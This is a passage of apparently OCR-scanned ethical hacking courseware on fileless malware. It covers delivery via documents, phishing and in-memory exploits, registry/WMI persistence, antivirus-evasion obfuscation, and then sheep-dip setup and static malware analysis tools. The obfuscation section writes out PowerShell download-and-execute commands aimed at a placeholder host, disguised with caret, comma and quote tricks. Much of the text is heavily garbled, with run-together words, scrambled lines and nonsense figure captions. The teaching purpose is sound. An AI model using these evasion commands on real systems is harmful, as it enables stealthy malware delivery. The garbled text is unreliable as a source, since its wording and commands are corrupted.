connect to one or more malicious
websitesto download additionalscriptsto deliver
the actualpayload.All theseoperations
occur i n memory, whichmakes it difficultfor
traditional
anti-malware
solutions
to detectthem.
Persistence
In general,
filelessmalwareis not persistenti n nature. As it is memory-based,
restarting
the systemwould remove the maliciouscodefrom memoryand stopthe infection.
However,depending on the goalof the attacker, maliciousscriptsc an be storedi n
various Windowsbuilt-in tools and utilities such as Windowsregistry, WMI,and
WindowsTaskScheduler, andbe setto run even after a system reboot.
© WindowsRegistry: Attackerscan store the maliciousscriptsi n the Windows
keys
AutoStartregistry so thattheya re loaded
andexecutedwhenever the machine
is restarted.
‘Windows
Management Instrumentation(WMI); FilelessmalwarealsoabusesWMI,
whichis commonly usedforautomating system administrationtasks,to achieve and
In this case,attackersstore the maliciousscripts
maintain persistence. i n the WMI
thatare periodically
repositories triggered
via WMI bindings.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Windows
TaskScheduler: a taskscheduler,
Using attackerscan set malicious
scripts
to beautomatically
triggered
andexecutedi n a chosentime interval.
Achieving
Objectives
Bymaintaining attackers
persistence, bypasssecuritysolutionsandachieve of
a variety
objectives,
suchas data exfiltration,credentialstealing,
reconnaissance,and cyber
spying,o n thetargetsystems
andnetwork,
ical andCountermensores
Mackin ©by E-Comel
Copyright
FilelessMalware through
Launching DocumentExploits
and
In-Memory
Exploits
DocumentExplo In-Memory
Explotts
oa
ON
Memory
oleincon
ReecveDtnieton
a following
steps:
malicious
document
through
c an be launched
Thevictim is trickedinto downloading/running
in the
runs
amalicious
macro
Thedocument
‘Themaliciousmacro launches
V BAor JavaScript
Themalicious scriptexploits
PowerShell code(payload)
to run additional to spread
the
infectionto otherrunningprocesses
or systems
ical andCountermensores
Mackin ©by E-Comel
Copyright
Victim
opensDocument
malious rans
document
maliious
VBA
2
script
launches
run macro
Macro
or SavaScpt
Macious exploits
Powershalltopayload
7.60;Launching
Figure Malwarethough
F ileless DocumentExploits
‘Launching
Fileless Malware throughIn-Memory
Exploits
Attackerscan injectmaliciouspayload insidethe running memory (RAM) that targetslegitimate
processes withoutleavinganyfootprints. Suchintrusion is extremely difficultto bedetected by
any antivirus software,
as the payload is not storedi n localdisksbut is directly executedfrom
memory. Attackersexploit differentAPIs or Windowsadmin tools such as Windows
Management Instrumentation (WMI), PSExec, and PowerShellto gain access to the process
memoryof a legitimate process.Attackersemploy a reflective Dynamic Link Library(DLL)
methodto loada maliciousscriptinto a host-sideprocess that resiststhe writingof DLLsto the
disk,
is a typeof in-memoryexploit
EternalBlue that can leverage
the flawsi n the Windows
file
sharing
protocol
knownas ServerMessage Block(SMB 4).Thisclient-servercommunication
protocol(SMB 1)allowsan attackerto readaccessservices,applications etc. Theattackerthen
targetsthe localsecurityauthoritysubsystemservice (Isass.exe) file,injectingmaliciouscode.
Thefile (Isass.exe)is designed
to handlelogin-logout validating user credentials,and it also
performs Theattackerexploits
othercriticaloperations. ths file to launchfurtherattackswhile
evading usingtoolssuchas Mimikatzto access the detailsfrommemory.
security
Exploit
Insmemory
EtemalBlue "> SMBL
injection
‘Memory
Invoke -ReflectiveDIlinjection
Suspicious
activity -7 Cleartext
Passwords
“password
Hashes
Figure payloads
761: Delvering i n-memoryexpats
using
ical andCountermensores
Mackin ©by E-Comel
Copyright
FilelessMalwarethrough
Launching Script-based
Injection
(©Fleesattacksae
obfuscated, also
performed
avoid
fileonthe
andcompiled to
wing the scrints where
eeations ok
b inaries
ands heleades
are embedded
(©
or andinfecttheapplications
Seip allowattackersto communiate
troced
operating without Being
systems
a
Â¥
Loaderconshiting
manus set es,
‘coast ote
Embeddedcode
$9 il
Placed
in
recess
mo
fond
y
>)
3
Downloeded
code
~ ~
rates
directly he ode
trom memory
ical andCountermensores
Mackin ©by E-Comel
Copyright
Launching
Fileless Malware byExploiting
System
Admin Tools
(©Atachersexpo
(© default
tools a dmin
system
Aacherswe Certtl andWindows
such
Management
a Cert, WMI andRegavr32
interface
Command lunch
to
infections
flees
(WMI) utestaste! infrmation
(©They
and
commande teks such
explot a5 Regsw32, rundal2to run maiious DLS
El
763:leless
Figure
malware
by
Launching
ical
abusing tools
sysadmin
andCountermensores
Mackin ©by E-Comel
Copyright
FilelessMalwarethrough
Launching Phishing
1@ letess
malware
expos vlnrabies in payload
toolsto loadandun malldous
system on theitn’
©
entries
Steps
depending on the goal
of the attacker.
followedbythe attackerto launchfilelessmalwarethrough
phishing
7.68:Launching
Figure a leless
malwarethrough
phishing
emailto the victim,embeddedwith a maliciouslink
Theattackersendsa phishing
ical andCountermensores
Mackin ©by E-Comel
Copyright
When the victim opens the email and clickson the malicious
link,the victim is
automatically
redirectedto a fakewebsite
suchas outdated Flash,
Thefake websitescans for vulnerabilitiesi n the system, to
triggerthe exploit
Now,the filelessmalwareexploits toolssuchas PowerShell
system to loadand run the
maliciouspayloadsi n memory.PowerShell
downloads the maliciouspayloads froma
remote command-and-control
server
keyis createdfor storingthe maliciousscripti n the victim's
TheAutoStart registry
system
to maintain persistence
Oncethe maliciouspayloadis injected,it stealscritical information,
performs
data
andalldata
cexfiltration,sends the to the attacker
ical andCountermensores
Mackin ©by E-Comel
Copyright
Persistencewith FilelessTechniques
Maintaining
‘hon o othermalware types,
compared lelessmalware
does
n ot use ik filesto spread
its infection
or
_achers
adopt
unique methods a s developing
such loadpoints
to restartinfectedpayloads
to malta
save
payload
_tackers the
tat for application
files,
malicious inside
theregistry holds
dat configuration, and
2 e-&
O
7.65:Maintaining
Figure with eles techniques
persistence
7
Module 964
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
FilelessMalware
1\asoenoosa
verentis
ate off 9s most
on xeon
he efor he and ae
Divergent |
inte rey o math prec
an
ols Pushes
18
onthe
Malware
Fileless Malware
=
Divergent
Divergent is a typeof filelessmalwarethat exploits NodelS, whichis a programthat
executes JavaScriptoutsidethe browser. Using Divergentfilelessmalware,attackers
generate revenue by targeting corporatenetworksthrough click-fraudattacks.It
strongly
depends on the registry forthe execution andstorageof configuration data
Furthermore,it employs a keyi n the registry
to maintain persistence and exploit
the
PowerShell
to injectitselfinto the other processes
on the infected
machine.I f the
infected process is running with the required
privileges,
it exploits
WMI to gather
information relatedto antivirus softwaresuchas Windows Defenderinstalledon the
targetsystem. If WindowsDefenderis installedon the targetsystem,it automatically
disablesvarious components of WindowsDefender and WindowsUpdates. After
infectingthe system,i t bypasses UAC through CMSTP.exe (MicrosoftConnection
Manager andstealscriticalinformationfromthe victim through
ProfileInstaller) URLs.
Module
7 965
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Divergentsend €2_deacon_and_sleep
pr
sipstring} ¢1psteing
eapstri
OFF78
Divergent_send_wiTP_request
Figure7.6:Screenshot
of Divergent
Someadditionalfilelessmalwareare as follows:
=
=
Astaroth
Backdoor
Nodersok
=
Vaporworm
njRatBackdoor
SodinokibiRansomware
KovterandPoweliks
Dridex:
Hancitor/Chanitor
SorebrectRansomware
Module
7 966
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
FilelessMalware
Antivirus Obfuscation
Techniques
Bypass to
(a inet
spel
aces
character
comma)
ad sch seman Bete
Obfuscation
FilelessMalware
Techniques
Antivirus(Cont'd)
Bypass to
1Inserting
Double Quotez
tnethe
double
quote
argon this
Thecommandparser
ss
ical andCountermensores
Mackin ©by E-Comel
Copyright
techniques
Thevarious obfuscation usedbyfilelessmalwareto bypass
antivirus solutions
a re
discussedbelow:
InsertingCharacters
insert special
Attackers characterssuchas commas (,)andsemicolons
(;)between
maliciouscommandsand stringsto makewell-knowncommandsmore difficult to
detect.Thesespecial
characters as whitespace
are considered i n command.
characters
hence,
line arguments; theyare processedeasily.
Using
this technique,
attackersbreak
malicious to evadeparsingofmalicious
strings commandsbysignature-based solutions.
yiemd.exe,/c,;,echo;powershell.exe
-NoExit -exec bypass -nop
Invoke-Expreseion
(New-Object
System.Net.WebClient)
Séecho
exit .DownloadString
‘https:
//targetwebsite.com―)
Inserting
Parentheses
In general
scenarios,parenthesesare usedto improvethe readability
ofthecode, group
complexexpressions,and splitcommands, Whenparentheses are used,variablesof a
code blockare considered just as a single-line
and evaluated command.Attackers
exploit
thisfeatureto splitandobfuscatemaliciouscommands.
cmd.exe /e ((echo command1)
56
echo command2)
)
CaretSymbol
Inserting
(*)is generally
The caret symbol a reservedcharacterusedi n shellcommands
for
escaping.Attackersexploitthis feature to escape maliciouscommandsat execution
time, Forthis purpose,theyinsert single insidea malicious
or doublecaret symbols
command.
C:\WINDONS\system32\cnd.exe Je
PAO**WAAOMAEAASA*H*MOAAIAALA®.
nop AA@*°x%%@
— -
-NOM*EXit ~exec bypass
_Invoke-Expression (New-Object_ —_System.Net.WebClient)
-
(( //targetwebsite.com―)
DownloadString ‘https:
Whenthe abovecommandis executed,
&:echo,exit
the first caret symbol
is escaped
/c pro*we*r*s*h*e*1"1*.*e*x%e-
C:\WINDOWS\system32\cmd.exe
No*Exit exec bypass -nop_Invoke-Expression _(New-Object
‘System.Net.WebClient)
//targetwebsite.com―)
Downloadstring(( ‘https: exit
&£echo,
After the secondcaret symbol
is also escaped,
powershell.exe
is executedwith a
‘command-line
argument:
C:\WINDOWS\system32\cmd.exe
/c powershell.exe -NoExit -exec
bypass-nop Invoke-Expression(New-Object System.Net.WebClient)
(( ‘https:
Downloadstring &£echo,exit
//targetwebsite-com―)
ical andCountermensores
Mackin ©by E-Comel
Copyright
DoubleQuotes
Inserting
Whena commandis embeddedwith double quotes,i t does not affect the normal
Furthermore,
execution of the command. the command-line
parseruses a doublequote
symbol as an argumentdelimiter.Attackersuse doublequotesymbols to concatenate
malicious
commands
Pow""er―"Shell
in arguments.
-N’"oExit -ExecutionPolicy bypass -noprofile -
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
©Fetanconcepts Ceuntroeatsres
e Virus and
Worm
Concepts Anti-MalwareSoftware
Malware Analysis
Malwareis a programdesigned
to perform activities (the
malicious term itselfis a contraction
software―).
of “malicious Malwaresuchas viruses, Trojans,worms, spyware, androotkitsallow
an attackerto breach security defenses andsubsequently launchattackso n targetsystems.
Thus,to find andfix existinginfectionsandthwart future attacks,
it is necessaryto perform
malwareanalysis.Many toolsandtechniques are available
to perform suchtasks.
Thissection explains
the malwareanalysis
procedure
and discusses
the various toolsusedto
accomplish
it.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is Sheep
DipComputer?
Asheepof
1©sheep
dipping
referstothe analysissuspect
ls, incoming etc. formalware
messages,
(© dipcomputer isinsaled
network
monitors,
with portmonitors,file monitors,
andconnectstoa network onlyunderstrelycontrolled conditions
andantvieussoftware
Sheep
DippingProcessTasks
fun usergroup andprocessmonitors
permission,
fun device
devera ndfe monitors
fun
an
registry kernelmonitors
Whatis Sheep
DipComputer?
Sheep
dipping
is a process used i n sheep farming,wherebysheep a re dipped i n chemical
solutionsto makethemparasite-free. In information andmalwareanalysis,
security sheep
dippingrefersto the analysis
of suspiciousfiles,incomingmessages,
etc.,for malware.
Theusers isolatethe sheep-dipped
computer fromother computers on the networkto block
any malware
all
from
entering Beforeperforming
the system. this process,it is important
downloadedprograms on externalmediasuchas CD-ROMs
to save
orDVDs.
A computerusedfor sheep dippingshouldhavetoolssuchas portmonitors,files monitors,
network monitors,and one or more antivirus programsfor performing
malwareanalysis
of
files,applications,
incomingmessages, externalhardwaredevices(suchas USBand pendrive),
andso on.
Sometasksthat are typically
run during
the sheep
dipping a re as follows:
process
+
Runuser,group permission,andprocessmonitors
+
Run portandnetworkmonitors
+
Rundevice
Runregistry
driver andfilemonitors
andkernelmonitors
ical andCountermensores
Mackin ©by E-Comel
Copyright
Antivirus SensorSystems
computer
sofware
1@An antveussensor estemie colectonof thatde 5
andanalyes malicious
code
@ &
Antivirus SensorSystems
‘An softwarethat detectsand analyzes
antivirus sensor systemis a collectionof computer
malicious codethreatssuchas viruses, worms, andTrojans.It is usedalong
with sheep
dip
computers.
S-e OQ&
i Tiana net
al ary
wh
Figure7.67:
Screenshotdisplaying
of Sensor
the workingAntivus System
7
Module 972
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
Introductionto MalwareAnalysis
Wy
States
Analyst
Teamsters
Te
Tote
eerietet
of
temas mace tne
ee ofan
Dynami
Aras sivas
rly
beperformed
‘amia nalyses to obtain
2
happened
Determine whatexactly
Determine
=
Identify
the
malicious
intent
indicatorsof compromise
of the malware
ical andCountermensores
Mackin ©by E-Comel
Copyright
Listthe indicators
ofcompromise fordifferentmachines
anddifferent
malware
programs
‘=
Findthe systemvulnerability
that the malwarehasexploited
‘=
Distinguish
the gatecrasher responsible
or insider forthemalware
entry
Themost common business answeredbymalwareanalysis
questions are as follows:
‘=
=
What
is
t
did
How
he
intention
t
of
hrough?
it get
the malware?
‘=
=
What
is impacton thebusiness?
ts
they?,andhowgood
Whoare the perpetrators, a re
=
=
to
How abolishthe malware?
‘=
Whatofis the medium the malware?
Whatare the preventive
measures?
Guidelinesfor MalwareAnalysis
Thefollowing
guidelines
are to be adopted
whileperforming
malwareanalysis:
During malwareanalysis,payattention to theessentialfeaturesinsteadof
every
detail
understanding
Trydifferenttoolsandapproaches
to analyze the malware, as a single
approach
may
not beuseful
Identify,
=
‘Types
analysis
prevention
techniques
of MalwareAnalysis
anddefeatn ew malware
understand,
ical andCountermensores
Mackin ©by E-Comel
Copyright
DynamicMalwareAnalysis
It alsoknownas behavioralanalysis,
is and it involvesexecutingthe malwarecodeto
knowhow it interacts with the hostsystemas well as its impact
on the hostsystemafter
it infectsthe system,
Dynamic
analysis
involvesthe execution of malwareto examine its conductand
operations,andit identifiestechnicalsignatures thatconfirmthe malicious intent. It
revealsinformationsuchas domainnames,file pathlocations, createdregistrykeys,IP
addresses,additional
files,installation
files,DLL,and linkedfileslocatedon the system
or network,
Bothtechniques howthe malwareworks,but theydiffer i n terms of the
aim to understand
toolsusedas wellas thetime andskillsrequired
forperformingtheanalysis.
It is recommended
that both static and dynamicanalyses be performed
to gain a deeper
understanding of the
functionality
ofmalware.
ical andCountermensores
Mackin ©by E-Comel
Copyright
MalwareAnalysis
Procedure:Preparing
Testbed
|
Step1 Allocate
a physical fortheanalysis ab
system
2|
Step
machine
(viwore,
nsalla Vitual Hyper e t onthe syst
|
Stop3 on inthe Vitwa machines)
Insallguest0S
| late
Stop4
system in
the rom thenetwork ensuringthat the NI aris “host mode
any―
Step
| Simulate
internetservices usingtools
s cha NetSim
Step
| “shared
folders"
“,uest
lation’
_Otable
the and
| install
Step?
maware analysis
tool
|
Stop8 GeneratethehashvalueofeachOSandtoo
|
Step9 malware
_Copythe over tothegest OS
Malware Analysis
Procedure
Malwareanalysis
provides
an in-depth
understanding
of eachsample
and identifiesemerging
technology ofmalwaresamples
trendsfroma vast collection withoutactually them.
executing
Themalwaresamplesare mostly
compatible
with the Windowsbinary
executable.Thereare
objectives
various for performing
malwareanalysis.
It is extremely
dangerous malwareo n production
to analyze devices connectedto production
networks.Therefore,o ne shouldalways
analyzemalwaresamples
i n a testing
environment on
an isolated
network.
Malware
1.
analysis
involves
the steps:
Preparing
Testbed
following
2.
3.
Static
Analysis
Analysis
Dynamic
Preparing
Testhed
to builda testbed:
Requirements
+
=
Target
your
Anisolatedtest networkto host
machines
testbedand isolatednetworkservices suchas DNS
installedwith a varietyof OSand configuration states (non-patched,
patched, etc.)
Virtualizationsnapshotsand re-imagingtools to wipe and rebuildthe targetmachine
quickly
for
Sometoolsare requiredtesting.Theimportant ones are listedbelow:
ical andCountermensores
Mackin ©by E-Comel
Copyright
tool:Togeta cleanimageforforensics
Imaging andprosecution
purposes.
File/data
analysis:
To perform staticanalysis
of potential
malwarefiles.
Registry/configuration
tools: Malware infectsthe Windowsregistryand other
configuration
variables.Thesetoolshelpto identify
thelastsavedsettings.
To perform
‘Sandbox: dynamic
analysis
manually.
Loganalyzers:
Thedevicesunderattackrecordthe activities of the malwareand
logfiles.Thesetoolsare usedto extractthelogfiles.
generate
© Networkcapture: Tounderstandhowthemalwareleverages thenetwork
Steps
to preparethe testbed:
+
Step4:Allocatea physical system for the analysislab
+
step2: installavirtualmachine(VMware, Hyper-V, etc.)o n the system
+
Step 3: Install
guest O Son thevirtual machine(s)
Step 4: Isolatethesystem fromthenetworkbyensuringthatthe NICcardis in the“host
only―
mode
Step 5: Simulate Internetservices usingtoolssuchas INetSim (https://www.inetsim.org)
Step 6: Disable“sharedfolders―
and“guest
isolation―
7:
Step Install malware
analysis
tools
Step
‘=
8:
Generate the hashvalueof
Step 9: Copythe malwareto the guest
eachOSandtool
OS
Tools
‘Supporting forMalware Analysis:
Somesupporting toolsrequired to perform malwareanalysis are asfollows:
Virtual MachinesTools:
=
(https://docs.microsoft.com)
Hyper-V
*
ParallelsDesktop
14 (https://www.parallels.com)
+
(https://www.apple.com)
Boot Camp
+
VMwareWorkstationPro(https://www.vmware.com)
ScreenCapture
andRecording
Tools:
=
(https://www.techsmith.com)
Snagit
+
(hteps://wow.techsmith.com)
Jing
*
(https://www.techsmith.com)
Camtasia
+
Exvid(https://www.e2vid.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
NetworkandInternet Simulation
Tools:
+
NetsimPro(https://tetcos.com)
=
ns-3(https://www.nsnam.org)
+
RiverbedModeler(htip://www-riverbed.com)
*
QualNet
(http://web.scalable-networks.com)
0 Backup
and ImagingTools:
=
GenieBackup
Manager Pro(https://www.zoolz.com)
=
Macrium ReflectServer(https://www.macrium.com)
=
(https://www.drive-image.com)
R-Drive Image
14(https://www.00-software.com)
(0&0Diskimage
Modul
7Page
978
tical
Making
and by
CountermensoresCopyright©
Comet
StaticMalwareAnalysis
of
1@In static anys, we donotrun the Some the static malwareanalysis
techniques:
i determine
employs
(ulely © one
different
maliciousmatware
caning
toolsa ndtechniques
fa fe s
to
Loeatand
e
information
aboutthemalware
Performing
stingsearch
te
©seeniving dependencies
@ watvarecsassomby
StaticMalware Analysis
Staticanalysis is the process an executable
of investigating filewithout runningor installingit
Thus,itis safeto conductstaticanalysis becausethe investigator
doesnot installor execute the
suspicious file.However, some malware doesnot needinstallationfor performing malicious
activities. Therefore, shouldperform
investigators static analysis
in a controlledenvironment,
Staticanalysis involvesaccessing the source code or binary
codeto find the data structures,
function calls,call graphs, etc., that can represent maliciousbehavior.Investigatorscan use
various tools to analyze binary code to understandthe file architectureand impacto n the
system, Compiling the source codeof a systeminto a binary executableresultsi n data loss,
whichmakesthe analysis of the code more difficult.Analyzing the binary code provides
information about the malwarefunctionality, its network signatures, exploitpackaging
technique, involved,
dependencies ete.
The procedure of examininga givenbinary withoutexecuting i t is mostly
manual.It requires
the extraction of vital data,
suchas datastructures,utilizedfunctions, andcallgraphs,
fromthe
malicious file.Thisdatacannot beviewedbyinvestigator afterprogramcompilation,
Somestatic malware analysistechniques
are listedbelow:
=
File
Local
fingerprinting
scanning
andonlinemalware
‘=
Performing
Identifying
search
strings
packing/obfuscationmethods
Finding portable
the (PE)
executables information
Identifyingdependencies
file
Malwaredisassembly
ical andCountermensores
Mackin ©by E-Comel
Copyright
StaticMalwareAnalysis:
File Fingerprinting
(©Fle fingerprinting
isthe proces of computing the hashal e for a givenbinary
code
use
1@ Youcan the computed
‘made
tothebinary
hash
codeduring
(©Usetoo ke HashMyfiles
valuet o uniquely
analysis
to calculate
dently themalwarea periodlalyerty any changes
various hash a les ofthemalwarele
are
Hashes
proses
the
hath
valve
of fle woe MOS,
Fite Fingerprinting
hashdeep
(htos/soureforge
net)
File Fingerprinting
Filefingerprinting
is a process of computingthe hashvaluefor a given binary codeto identify
andtrackdataacrossa network.Thisprocessincludes thecalculation of cryptographichashes
of the binary code to recognizeits function and compareit with other binary code and
programsfrom previous scenarios. Thecomputed hashvaluecan be usedto uniquely identify
themalwareor periodically verifyif anychangesare madeto the binarycodeduring analysis.
Thesefingerprints are used to track and identify similar programs from a database.
Fingerprintingdoesnot workforcertain recordtypes, encrypted
including or password-secured
files,images, audio,and video,whichhavedifferent content compared to the predefined
fingerprint.
Message-Digest 5 (MDS)
Algorithm and SecureHashAlgorithm 1 (SHA-1)are the most
commonly
Usedto create a fingerprint
GUL-based
ofthe tools
usedhashfunctionsfor malwareanalysis.
suspicious
Various suchas HashMyfiles
file as partofthe static analysis.
tool that can calculatevarious hashvalues.
can be
HashMyFiles is a
=
HashMyFiles
Source:https://www.nirsoft.net
HashMyFilesproducesa hashvaluefor a file usingMDS, SHA1, CRC32,SHA-256, SHA-
512,and SHA-384algorithms. The program also provides informationabout the file,
suchas thefull path
of the file,date of creation,date of modification,
file size, file
attributes, which helpsi n searching
file version, and extension, for and comparing
similarfiles.
ical andCountermensores
Mackin ©by E-Comel
Copyright
of HashMyfiles
7.58:Screenshot
Figure
Someadditionalfile fingerprinting
toolsare as follows:
+
Mimikatz(https://github.com)
+
(http://implbits.com)
Hashtab
+
(https://www.slavasoft.com)
HashCale
hashdeep
(https://github.com)
MbSsums(http://www.pc-tools.net)
StaticMalware Analysis:
Local and Online Malware Scanning
|@ Scanthe
‘ptocnte
antebinary
code
locally
wel
known ang
sere
and Spores
soware andi Virwetoal |
‘stot afte that
nas
aves
he
You
can ale load thecadet o otinewebs ich
2 Vieurotl opt seanned bya widearetyof
{Local
and Tools
b d Ans
OnlineMalwareSeanning
p/m yond oncom)
‘Local
andOnline Malware Scanning
Youcan scan the binary
codelocally
using well-knownandup-to-date
antivirus software.If the
codeunderanalysis it may havealready
of a well-knownmalware,
is a component been
discoveredand documentedbymany antivirus vendors.You can also upload the code to
bya widevarietyof scan engines.
suchas VirusTotalto getit scanned
‘websites
the hashvaluesof a suspicious
VirusTotalcalculates file and comparesthemwith onlineand
offline malwaredatabasesto determinethe existenceof the recognizedmaliciouscode.This
processsimplifies by offering
further investigation deeper insightsinto the code,its
functionality,other
=
andessential
VirusTotal
details.
Source:https://www.virustotal.com
VirusTotal
is a free service that analyzes suspiciousfilesand URLs.In addition,i t
facilitatesthe detectionof viruses, worms, Trojans, a reportthat
etc. It generates
provides the total numberof enginesthat markedthefile as malicious, the malware
name, and, if available,additionalinformationaboutthe malware.
It alsooffers important detailsof the online file analysis,
suchas targetmachine,
compilation timestamp, typeof file,compatible entrypoint,PEsections,
processors,
datalinklibraries(DLLs), usedPEresources,differenthashvalues, IP addresses
accessed
or containedi n the file,programcode, andtypeofconnectionsestablished.
ical andCountermensores
Mackin ©by E-Comel
Copyright
7.69:
Figure
of ScreenshotVrusTota
Someadditionallocalandonlinemalwarescanning
toolsare as follows:
=
Hybrid (https://www.hybrid-analysis.com)
Analysis
=
CuckooSandbox(https://cuckoosandbox.org)
=
Jotti (https://virusscan
jotti.org)
Valkyrie
Sandbox(https://valkyrie.comodo.com)
OnlineScanner(https://www
fortiguard.com)
asto
entrat
embeded
(@Usetoo such inex rom
strings
stones
©
com toon
1 ese co
hes/owmcesec
Performing Search
Strings
Softwareprograms includesome stringsthat are commands for performing
specific
functions
such
as
printing
output.
memoryor cookie data,
communicate information
Strings
the maliciousintent of a program,suchas reading
existingstringscan represent
embedded i n the compiledbinarycode.
to
fromtheprogram its user. Various
the internal
Searching
through about the basicfunctionality
information
the stringscan provide of any
program. During malwareanalysis, searchfor the maliciousstringto determinethe harmful
actions that a programcan perform. For instance,i fthe programaccessesa URL,i t will have
that particularURLstringstoredi n it. It is advisableto bealertwhile lookingfor strings
andalso
for
search theembedded andencrypted
Usetoolssuchas BinTextto extract embeddedstrings
file.
to detectthe suspicious
strings
fromexecutablefiles.Ensurethat the
tool can scan and displayASCIIand Unicodestrings as well. Sometools can extract all the
strings andcopythemto a text or documentfile.Usesuchtoolsto copythe strings
to a text file
to ease
=
the
taskof searching
BinText
for
malicious
strings.
Source:https://www.aldeid.com
BinTexti s a text extractor thatcan extract text fromanyfile.It can findplain
ASCIItext,
Unicodetext, andresource strings, providing usefulinformationfor eachitem.
ical andCountermensores
Mackin ©by E-Comel
Copyright
T Bintext303
| |[EWser\TesiDesitopwikiwam
Seach Fer
| Heb
Floto
scan ove Biome | [Go
Advanced
[File
view
taken:
[Mempos. [rea Text
747(07
Time 0.000cece sie byte
a
n
pos
‘A
onooo9n00040on000400040 TThis cannotb ewn DOS
program made
4 oogo00000178
000900400178
‘A
data
“A
oogooon001A0
on09004001A0 tent
oooo00n00;c8
—onoooo4anics ‘data
hilop
“A
ooooonn00208
000000401008 hip.e n kid iklSpecitRandom
‘A
oogoonn00234
on0g00401034
A oooo00nn02s¢
on00oo4arO5C
4 oooo0n000202
oodd004n1002
ovnosded
o1/W/index
php
enecut
ke
‘<body
ilestacton
22 ‘ehode'
ONLOAD="vindow
et document
port
©
A oogoonn00322
on0g04ar
‘A
actor
“4 on0o004aT
1A,
oooo00n00340
on00040r140 SOFTWARE
Wierosot\Windowe\CutertVeson
ProgantesDi
on00004arTo
oooo00n00364
A oogoo0n002AF TAF \Irteret Expoespero
‘A
oogo00nn0se7
_onogo04a2007 ‘Awokbv Second
Pat Hel
\<
Reed —_||AN
40 50
Figure
7.70:Screenshot
of BinText
Someadditionalstringsearching
toolsare as follows:
FLOSS (https://www
fireeye.com)
(https://docs.microsoft.com)
‘Strings
Free EXEDLLResource Extract(http://www.
resourceextract.com)
(https://wwwfileseek.ca)
FileSeek
HexWorkshop (http://www.
hexworkshop.com)
Modul
7 985
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
StaticMalware Analysis:
Identifying
Packing/Obfuscation
Methods
(©
atuchers
use
packers
compress,
often
encryptor modiyamalware
to
executable
fle
PELa
signatures
Te PIOtoolprovides
des bouttheWindowsenecuable
to oid detection fest can deny asacited withove 600
(© Tools
Packaging/Obfuscation
Mocro_Pack
tas/ihut.com)
©
1 thu
UPKhps//upe
ASPockhtn//maospackcom)
io)
Identifying Methods
Packing/Obfuscation
Attackersuse packing andobfuscationto compress,encrypt, or modify a malwareexecutable
file to avoiddetection.
Obfuscation alsohidesthe execution of the programs.Whenthe user
executesa packed program,it alsoruns a smallwrapperprogramto decompress the packed file
andthenrun the unpacked file. Thiscomplicates
reverse engineers’attempts to find out the
actualprogramlogic andothermetadatavia staticanalysis.
You shouldtry to determineif the file includespacked elementsand alsolocatethe tool or
methodusedforpacking it. Usetoolssuchas PEId,whichdetectsmost commonly usedpackers,
cryptors, andcompilersfor PEexecutablefiles.Finding the packer will ease the taskof selecting
a toolfor
=
unpackingcode.
PEID
the
Source:https://www.aldeid.com
PEIDis a free tool that provides
detailsaboutWindowsexecutablefiles. It can identify
signaturesassociatedwith over 600 differentpackers and compilers. Thistool also
displaysthe typeof packers usedfor packing
the program. It also displays
additional
EPsection,andsubsystem
detailssuchas entrypoint,fle offset, usedforpacking,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Bre wss -
x
Fle:
[EOSH
ods
\OBWvii
Mode
Malware
[a]O7 TreaWrusesWlezVeust.
Entypont: [00008458
Fle
Offeet: [00008859
BP Section: [text
[55,886C,60 [>]
FestOytes:
ES]
Unkerinfo: [60 Subsystem:
[Waza [3]
|Tek
vener
assean |
Fstayon
top
| |_Optens
packaging/obfuscation
Someadditional toolsare as follows:
=
=
Macro_Pack
(https://github.com)
(https://upx.github.io)
UPX
(http://www.aspack.com)
ASPack
ical andCountermensores
Mackin ©by E-Comel
Copyright
StaticMalware Analysis: the PortableExecutables
Finding
(PE) Information
PEExplorer
© Extraction
Portable
PE
tecuuble
Tools
Seanez
the PortableExecutables(PE)
Finding Information
(PE)
ThePortableExecutable format is an executablefile formatusedon WindowsOS,
which
stores the information
that a Windows systemrequiresto managethe executable code.It
stores metadataabout the program,whichhelps i n finding
additionaldetailsof the fil. For
instance, the Windowsbinary is i n PEformat,andit consistsof informationsuchas time of
creation and modification,importand exportfunctions, compilation time,DLLs, linked files,
strings,menus,andsymbols. ThePEformat contains a headerandsections that store metadata
about
the in
a n
ofacontains
ThePE
following
file andcodemapping
sections:
file the
OS.
instructions
‘=
the
‘+
text: Contains
well
andprogramcodethat the CPUexecutes.
rdata:Contains importandexportinformation as as otherread-onlydata used
bythe program.
-data:Containsthe program's
global
data,
whichthe system can access fromanywhere
Youcan
menus,and
strings,additional
asthis sectionoffers
the headerinformationto gather
use
multi-lingual
support.
detailsofa file or program, suchas its
features.
Youcan use toolssuchas PEViewto extract theabove-mentioned information.
+
PEExplorer
Source:http://www.heaventools.com
PEExplorerlets you open, view, and edit a varietyof 32-bitWindowsexecutablefile
types(also
calledPEfiles)rangingfromcommon types,suchas EXE, DLL,andActiveX
ical andCountermensores
Mackin ©by E-Comel
Copyright
types,suchas SCR(Screensavers),
to lessfamiliar
Controls, CPL(Control
PanelApplets),
SYS,
MSSTYLES, and more (including
BPL,DPL, executablefiles that run on the MS
Mobileplatform).
Windows
772:of
Figure Screnshat PEExplorer
SomeadditionalP Eextraction toolsare as follows:
=
PortableExecutable (https://tzworks.net)
(pescan)
Scanner
=
Resource (http://www.angusj.com)
Hacker
=
(https://www.aldeid.com)
PEView
ical andCountermensores
Mackin ©by E-Comel
Copyright
StaticMalwareAnalysis: File Dependencies
Identifying
(©
watk
with
internal
toDependency
Prograneedto
oeton
propery Dependency
Walker
Walker of
an ystems
stall thedependent
fle ondbudsMerarchal
ree eagrams
modules
ao records
ereutable
the
Check
inked
Istohe dynamical the mare
as
Dependency
Walker
stots such oer the
1 Dependency
To
Otes/ermylong
nck
Depengeny
Checking
thu
ki tee oti
File Dependencies
Identifying
Anysoftwareprogram depends on various inbuilt librariesof a n OSthat help i n performing
specified actions in a system. Programs needto workwith internalsystem filesto function
correctly. They store the importand exportfunctionsin a kernel32.dllfile, Filedependencies
contain information aboutthe internal system files that the programneedsto function
properly, the process of registration,
andlocationon themachine.
You needto find the librariesandfile dependencies, as theycontain informationaboutthe run-
time requirements of an application.Subsequently, you needto checkif theycan findand
